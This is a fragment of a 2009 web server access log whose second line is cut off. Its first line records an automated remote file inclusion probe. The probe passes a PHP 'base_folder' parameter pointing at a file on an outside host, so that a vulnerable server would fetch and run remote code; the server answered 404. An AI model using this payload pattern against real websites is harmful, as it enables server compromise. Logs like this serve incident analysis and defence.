94.23.2.21 - - [17/Oct/2009:05:42:20 -0400] "GET /logs/access_log.Q109092800%20%20//Neos_Chronos/header.php?base_folder=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:42:20 -